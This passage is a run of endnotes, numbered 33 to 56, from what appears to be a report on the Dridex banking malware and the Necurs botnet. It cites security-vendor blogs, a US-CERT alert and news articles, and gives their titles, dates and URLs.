33 (U); Mithun Sanghavi; Symantec Voice of the Customer Blog; “DRIDEX and how to overcome it”; 30 MAR 2015; https://www.symantec.com/connect/blogs/dridex-and-how-overcome-it; accessed on 10 OCT 2016.
34 (U); Mithun Sanghavi; Symantec Voice of the Customer Blog; “DRIDEX and how to overcome it”; 30 MAR 2015; https://www.symantec.com/connect/blogs/dridex-and-how-overcome-it; accessed on 10 OCT 2016.
35 (U); Mithun Sanghavi; Symantec Voice of the Customer Blog; “DRIDEX and how to overcome it”; 30 MAR 2015; https://www.symantec.com/connect/blogs/dridex-and-how-overcome-it; accessed on 10 OCT 2016.
36 (U); Mithun Sanghavi; Symantec Voice of the Customer Blog; “DRIDEX and how to overcome it”; 30 MAR 2015; https://www.symantec.com/connect/blogs/dridex-and-how-overcome-it; accessed on 10 OCT 2016.
37 (U); Mithun Sanghavi; Symantec Voice of the Customer Blog; “DRIDEX and how to overcome it”; 30 MAR 2015; https://www.symantec.com/connect/blogs/dridex-and-how-overcome-it; accessed on 10 OCT 2016.
38 (U); Mithun Sanghavi; Symantec Voice of the Customer Blog; “DRIDEX and how to overcome it”; 30 MAR 2015; https://www.symantec.com/connect/blogs/dridex-and-how-overcome-it; accessed on 10 OCT 2016.
39 (U); Mithun Sanghavi; Symantec Voice of the Customer Blog; “DRIDEX and how to overcome it”; 30 MAR 2015; https://www.symantec.com/connect/blogs/dridex-and-how-overcome-it; accessed on 10 OCT 2016.
40 (U); US-CERT; Alert (TA15-286A); “Dridex P2P Malware”; 29 SEP 2016; https://www.us-cert.gov/ncas/alerts/TA15-286A; accessed on 19 JAN 2017.
41 (U); Proofpoint; “It's Quiet...Too Quiet: Necurs Botnet Outage Crimps Dridex and Locky Distribution”; 09 JUN 2016; https://www.proofpoint.com/us/threat-insight/post/necurs-botnet-outage-crimps-dridex-and-locky-distribution; accessed on 19 AUG 2016; (U); Article published on the website of the cybersecurity company Proofpoint.
42 (U); Proofpoint; “It's Quiet...Too Quiet: Necurs Botnet Outage Crimps Dridex and Locky Distribution”; 09 JUN 2016; https://www.proofpoint.com/us/threat-insight/post/necurs-botnet-outage-crimps-dridex-and-locky-distribution; accessed on 19 AUG 2016; (U); Article published on the website of the cybersecurity company Proofpoint.
43 (U); Joe Uchill; The Hill; “Botnet behind major malware attacks goes offline”; 08 JUN 2016; http://thehill.com/policy/cybersecurity/282730-botnet-behind-major-malware-attacks-goes-offline; accessed on 19 AUG 2016.
44 (U); Proofpoint; “It's Quiet...Too Quiet: Necurs Botnet Outage Crimps Dridex and Locky Distribution”; 09 JUN 2016; https://www.proofpoint.com/us/threat-insight/post/necurs-botnet-outage-crimps-dridex-and-locky-distribution; accessed on 19 AUG 2016; (U); Article published on the website of the cybersecurity company Proofpoint.
45 (U); Joe Uchill; The Hill; “Botnet behind major malware attacks goes offline”; 08 JUN 2016; http://thehill.com/policy/cybersecurity/282730-botnet-behind-major-malware-attacks-goes-offline; accessed on 19 AUG 2016.
46 (U); Proofpoint; “It's Quiet...Too Quiet: Necurs Botnet Outage Crimps Dridex and Locky Distribution”; 09 JUN 2016; https://www.proofpoint.com/us/threat-insight/post/necurs-botnet-outage-crimps-dridex-and-locky-distribution; accessed on 19 AUG 2016; (U); Article published on the website of the cybersecurity company Proofpoint.
47 (U); Proofpoint; “It's Quiet...Too Quiet: Necurs Botnet Outage Crimps Dridex and Locky Distribution”; 09 JUN 2016; https://www.proofpoint.com/us/threat-insight/post/necurs-botnet-outage-crimps-dridex-and-locky-distribution; accessed on 19 AUG 2016; (U); Article published on the website of the cybersecurity company Proofpoint.
48 (U); Sudeep Singh, Geok Meng Ong, Joonho Sa, Ronghwa Chong, Shinsuke Honjo; FireEye Threat Research Blog; “Evolution of Dridex”; 18 JUN 2015; https://www.fireeye.com/blog/threat-research/2015/06/evolution_of_dridex.html; accessed on 02 JUN 2016.
49 (U); Deborah Radcliffe; CSO Online; “Polymorphic Malware: A Threat That Changes on the Fly”; 17 APR 2007; http://www.csoonline.com/article/2122123/malware-cybercrime/polymorphic-malware--a-threat-that-changes-on-the-fly.html; accessed on 19 AUG 2016; (U); Article published on CSO Online, which provides news and analysis on a variety of security and risk management topics.
50 (U); Dark Reading; “Machine Learning In Security: Good & Bad News About Signatures”; 30 MAR 2016; http://www.darkreading.com/attacks-breaches/machine-learning-in-security-good-and-bad-news-about-signatures/a/d-id/1324888; accessed on 13 OCT 2016; (U); Article published on the cybersecurity news website Dark Reading.
51 (U); Proofpoint; “It's Quiet...Too Quiet: Necurs Botnet Outage Crimps Dridex and Locky Distribution”; 09 JUN 2016; https://www.proofpoint.com/us/threat-insight/post/necurs-botnet-outage-crimps-dridex-and-locky-distribution; accessed on 19 AUG 2016; (U); Article published on the website of the cybersecurity company Proofpoint.
52 (U); Trend Micro; “DRIDEX Poses as Fake Certificate in Latest Spam”; 01 JUN 2016; http://blog.trendmicro.com/trendlabs-security-intelligence/dridex-poses-as-fake-certificate/?utm_source=trendlabs-social&utm_medium=twitter&utm_campaign=2016-06-dridex-certificate; accessed on 18 JAN 2017; (U); Article from Trend Micro’s Security Intelligence Blog.
53 (U); Trend Micro; “DRIDEX Poses as Fake Certificate in Latest Spam”; 01 JUN 2016; http://blog.trendmicro.com/trendlabs-security-intelligence/dridex-poses-as-fake-certificate/?utm_source=trendlabs-social&utm_medium=twitter&utm_campaign=2016-06-dridex-certificate; accessed on 18 JAN 2017; (U); Article from Trend Micro’s Security Intelligence Blog.
54 (U); Trend Micro; “DRIDEX Poses as Fake Certificate in Latest Spam”; 01 JUN 2016; http://blog.trendmicro.com/trendlabs-security-intelligence/dridex-poses-as-fake-certificate/?utm_source=trendlabs-social&utm_medium=twitter&utm_campaign=2016-06-dridex-certificate; accessed on 18 JAN 2017; (U); Article from Trend Micro’s Security Intelligence Blog.


55 (U); Trend Micro; “DRIDEX Poses as Fake Certificate in Latest Spam”; 01 JUN 2016; http://blog.trendmicro.com/trendlabs-security-intelligence/dridex-poses-as-fake-certificate/?utm_source=trendlabs-social&utm_medium=twitter&utm_campaign=2016-06-dridex-certificate; accessed on 18 JAN 2017; (U); Article from Trend Micro’s Security Intelligence Blog.

56 (U); Trend Micro; “DRIDEX Poses as Fake Certificate in Latest Spam”; 01 JUN 2016; http://blog.trendmicro.com/trendlabs-security-intelligence/dridex-poses-as-fake-certificate/?utm_source=trendlabs-social&utm_medium=twitter&utm_campaign=2016-06-dridex-certificate; accessed on 18 JAN 2017; (U); Article from Trend Micro’s Security Intelligence Blog.
